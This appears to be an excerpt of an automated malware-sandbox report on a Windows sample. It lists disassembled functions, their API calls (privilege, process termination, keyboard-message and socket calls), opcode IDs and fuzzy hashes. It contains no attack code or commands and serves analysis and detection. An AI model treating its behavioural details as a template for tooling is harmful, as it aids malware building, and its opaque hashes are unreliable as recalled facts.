                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: 953c4a8de9d730ba7846be57659be636efabe1ac4d1565379698fd11b098aa54
                                                              • Instruction ID: 065c7c010fac60c6108931cde655f16d522e44e289716a6c501ce773df8dccef
                                                              • Opcode Fuzzy Hash: 953c4a8de9d730ba7846be57659be636efabe1ac4d1565379698fd11b098aa54
                                                              • Instruction Fuzzy Hash: BF41CD71600204AFDB05EF98CA95FBEB7E5AF44310F05C499FA069F2D2DF74A9408B51
                                                              Function 00AF5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00AF58B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              • Opcode ID: 2c2e450301488c776f2cfabe9391e5b242de531eda150320481247ff74cdf023
                                                              • Instruction ID: 1916e1786764c8480f479fedba1178034dfe28a1872b3fcbdd5fee78e0e316ef
                                                              • Opcode Fuzzy Hash: 2c2e450301488c776f2cfabe9391e5b242de531eda150320481247ff74cdf023
                                                              • Instruction Fuzzy Hash: D411EE31A0D74ABAE7055BA4DC82D7A37DC9F15764F30003AF742A6281E7749A0056A4
                                                              Function 00AFA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00AFA806
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 4ba80db6255df46810335f02d5286969ff0942eecd4de66ecc2bb8cbee24a160
                                                              • Instruction ID: ad80bd8e905dc79bcdc91f339314f3e27848902a0b373fedb02a9b8b0cf4cfb9
                                                              • Opcode Fuzzy Hash: 4ba80db6255df46810335f02d5286969ff0942eecd4de66ecc2bb8cbee24a160
                                                              • Instruction Fuzzy Hash: B9C177B5A0020A9FDB04DF98D581BFEB7F4EF18351F20806AF61AE7241D774AA45CB91
                                                              Function 00AF6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AF6B63
                                                              • LoadStringW.USER32(00000000), ref: 00AF6B6A
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AF6B80
                                                              • LoadStringW.USER32(00000000), ref: 00AF6B87
                                                              • _wprintf.LIBCMT ref: 00AF6BAD
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF6BCB
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00AF6BA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              • Opcode ID: 0be72637bca6afa53b0336cff1ca6f28cd865499695be313a67f4b6ca5a19f71
                                                              • Instruction ID: c50f0ab69ca72634a5cf26289fbd938ab81099f05ec75cd92a6d109c32b21f17
                                                              • Opcode Fuzzy Hash: 0be72637bca6afa53b0336cff1ca6f28cd865499695be313a67f4b6ca5a19f71
                                                              • Instruction Fuzzy Hash: 3A0112F69002187FE711A7D4AD89EFA776CEB04304F104495B746E7151EA749E848B74
                                                              Function 00B12B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00B13C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B12BB5,?,?), ref: 00B13C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B12BF6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 2595220575-0
                                                              • Opcode ID: 2c6f0a9c4cfd5ce8aff4f89bebffe00ab26b8561301f2706e8ccd966b19bdd15
                                                              • Instruction ID: f7882db76d7d59ce91a5660e5b749c445539aa4560553fb6408a9b7f6a892886
                                                              • Opcode Fuzzy Hash: 2c6f0a9c4cfd5ce8aff4f89bebffe00ab26b8561301f2706e8ccd966b19bdd15
                                                              • Instruction Fuzzy Hash: 81919A712042009FCB14EF54D991FAEB7E5FF88310F54886DF9969B2A2DB30E995CB42
                                                              Function 00B095BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • select.WSOCK32 ref: 00B09691
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B0969E
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00B096C8
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B096E9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B096F8
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00B097AA
                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00B4DC00), ref: 00B09765
                                                                • Part of subcall function 00AED2FF: _strlen.LIBCMT ref: 00AED309
                                                              • _strlen.LIBCMT ref: 00B09800
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                              • String ID:
                                                              • API String ID: 3480843537-0
                                                              • Opcode ID: e34f0e12323cc434e10a6ae0abf405487a9ce728f5d814d40afeba976270dc8a
                                                              • Instruction ID: b6cb8afcda185944a4e3635673bee1b569dd33bfbd2416958bed13f81873b83c
                                                              • Opcode Fuzzy Hash: e34f0e12323cc434e10a6ae0abf405487a9ce728f5d814d40afeba976270dc8a
                                                              • Instruction Fuzzy Hash: EC81BA31504240ABC714EF64CE85EABBBE8EF89710F108A5DF5559B2A2EB30DD04CB92
                                                              Function 00ADA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __mtinitlocknum.LIBCMT ref: 00ADA991
                                                                • Part of subcall function 00AD7D7C: __FF_MSGBANNER.LIBCMT ref: 00AD7D91
                                                                • Part of subcall function 00AD7D7C: __NMSG_WRITE.LIBCMT ref: 00AD7D98
                                                                • Part of subcall function 00AD7D7C: __malloc_crt.LIBCMT ref: 00AD7DB8
                                                              • __lock.LIBCMT ref: 00ADA9A4
                                                              • __lock.LIBCMT ref: 00ADA9F0
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B66DE0,00000018,00AE5E7B,?,00000000,00000109), ref: 00ADAA0C
                                                              • EnterCriticalSection.KERNEL32(8000000C,00B66DE0,00000018,00AE5E7B,?,00000000,00000109), ref: 00ADAA29
                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 00ADAA39
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1422805418-0
                                                              • Opcode ID: 2a559d59c334c59d2d63001ff5a77e7b694f3eccb2d6bc1ff409c8f286be4407
                                                              • Instruction ID: bc2d1ad58578fd67dd2bfbf70cbf1a99d70786700cc7cd92933cd0595351ceea
                                                              • Opcode Fuzzy Hash: 2a559d59c334c59d2d63001ff5a77e7b694f3eccb2d6bc1ff409c8f286be4407
                                                              • Instruction Fuzzy Hash: CC414771A012019BEB149F68DA4479DB7B0AF21374F20831BE52BAB3E1DB749D40CB82
                                                              Function 00B18ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00B18EE4
                                                              • GetDC.USER32(00000000), ref: 00B18EEC
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B18EF7
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00B18F03
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00B18F3F
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B18F50
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B1BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00B18F8A
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B18FAA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: 664c8fde8dfe0a313c81e5f4cab0bfd74f7562793f777d6e62caa7a329386b16
                                                              • Instruction ID: 8c7111f2c2fd601f7a74d833fc92c1ab3e29dffe70d38d2adbaafd54f90bf82d
                                                              • Opcode Fuzzy Hash: 664c8fde8dfe0a313c81e5f4cab0bfd74f7562793f777d6e62caa7a329386b16
                                                              • Instruction Fuzzy Hash: 80316B72200614BFEB108F50DC8AFEA3BA9FF49715F044065FE08DB191CAB59842CBB0
                                                              Function 00B016DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                              • _wcstok.LIBCMT ref: 00B0184E
                                                              • _wcscpy.LIBCMT ref: 00B018DD
                                                              • _memset.LIBCMT ref: 00B01910
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X
                                                              • API String ID: 774024439-3081909835
                                                              • Opcode ID: b0b347eec7191ad30f95e3e2f34089d06375d605bcbbc85232a33561f5798e62
                                                              • Instruction ID: daa16d179ee89a0e64adf75c1d6be956ec9b5fff59e67cb7b9754583b0a7f6ae
                                                              • Opcode Fuzzy Hash: b0b347eec7191ad30f95e3e2f34089d06375d605bcbbc85232a33561f5798e62
                                                              • Instruction Fuzzy Hash: BFC163316043409FC718EF68CA91A9EBBE4FF85354F04496DF59A972A2DB30ED45CB82
                                                              Function 00B20133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • GetSystemMetrics.USER32(0000000F), ref: 00B2016D
                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00B2038D
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B203AB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00B203D6
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B203FF
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00B20421
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B20440
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                              • String ID:
                                                              • API String ID: 3356174886-0
                                                              • Opcode ID: 816dc7f7d0df1569084783d0dfb956b3f51f13347793a9c57dc6bbc52a148a56
                                                              • Instruction ID: 884c7fd44c3efa42f4d73a7d3df0ea820a731a7b8c76495504c8cf13cdc0edb3
                                                              • Opcode Fuzzy Hash: 816dc7f7d0df1569084783d0dfb956b3f51f13347793a9c57dc6bbc52a148a56
                                                              • Instruction Fuzzy Hash: 7EA1DD30600626EFDB18DF28D9897BDBBF1FF08700F148195E858AB295DB34AD60CB90
                                                              Function 00ACAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90cd188aa2dcec83387586ebab3a4a1e8b8fd250243dedc37461c811bcb3edc2
                                                              • Instruction ID: 821117f5e621e7943be2ba8ca6c25f28411fe036d8d9c3f9bbf5a7b6aff27d01
                                                              • Opcode Fuzzy Hash: 90cd188aa2dcec83387586ebab3a4a1e8b8fd250243dedc37461c811bcb3edc2
                                                              • Instruction Fuzzy Hash: 667147B1900109AFCB14CF98CC89EBEBBB8FF85314F25814DF915AA251C730AA51CBA5
                                                              Function 00B12230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B1225A
                                                              • _memset.LIBCMT ref: 00B12323
                                                              • ShellExecuteExW.SHELL32(?), ref: 00B12368
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                              • CloseHandle.KERNEL32(00000000), ref: 00B1242F
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00B1243E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 4082843840-2766056989
                                                              • Opcode ID: 340dcb863632ff74ead700f766fb86845808a778ae58fcbe57d6ab510f270acb
                                                              • Instruction ID: 601b7dbb7655df2222d6ef9ac6ca0c1dd39835e94ba93d6617529dbdd294bd95
                                                              • Opcode Fuzzy Hash: 340dcb863632ff74ead700f766fb86845808a778ae58fcbe57d6ab510f270acb
                                                              • Instruction Fuzzy Hash: CD716D74A006199FCF04EFA4D981AEEBBF5FF48310F108499E956AB351DB34AD50CB94
                                                              Function 00AF3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00AF3DE7
                                                              • GetKeyboardState.USER32(?), ref: 00AF3DFC
                                                              • SetKeyboardState.USER32(?), ref: 00AF3E5D
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AF3E8B
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AF3EAA
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AF3EF0
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AF3F13
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: a9201fccd7f9cb7234eac649a4fab26d0999597a959db8ff600b5b1ea41e3923
                                                              • Instruction ID: 86ab9e39b13b2f083623bbbe6513e049e0fba33df7eeb36e8c70b95c03baef5f
                                                              • Opcode Fuzzy Hash: a9201fccd7f9cb7234eac649a4fab26d0999597a959db8ff600b5b1ea41e3923
                                                              • Instruction Fuzzy Hash: D951C3A1A047D93DFF3643A4CC45BBA7EE95F06304F088589F2D54A8C2D7949EC8D760
                                                              Function 00AF3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00AF3C02
                                                              • GetKeyboardState.USER32(?), ref: 00AF3C17
                                                              • SetKeyboardState.USER32(?), ref: 00AF3C78
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AF3CA4
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AF3CC1
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AF3D05
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AF3D26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 40221f1e31eaa154a3638d51a575910e4602b86424a95258918b69a71af22e65
                                                              • Instruction ID: 5f63b66ecdf702e8f710a7ce3a05f76518be8505a1cd875a9bd715675b4ff6e1
                                                              • Opcode Fuzzy Hash: 40221f1e31eaa154a3638d51a575910e4602b86424a95258918b69a71af22e65
                                                              • Instruction Fuzzy Hash: 925109A25047D93DFF3683B4CC55B7ABFA96F06300F088988F2D5564C2D694EE89D760
                                                              Function 00AF7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: b836096edb4b2207e80aaaef69508ea2d1aa5455e810829f7b752fb1ac2a9fda
                                                              • Instruction ID: f39e9ac164f8f57ce8e3bba9295fd8fe41cc6cc5b23194f37b6459f2f523334a
                                                              • Opcode Fuzzy Hash: b836096edb4b2207e80aaaef69508ea2d1aa5455e810829f7b752fb1ac2a9fda
                                                              • Instruction Fuzzy Hash: 00417E66C20218B6CB10EBF4CC46ADFB3ACAF14710F548967F506E3221FA34E624C3A5
                                                              Function 00B13D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                              Download Yara Rule
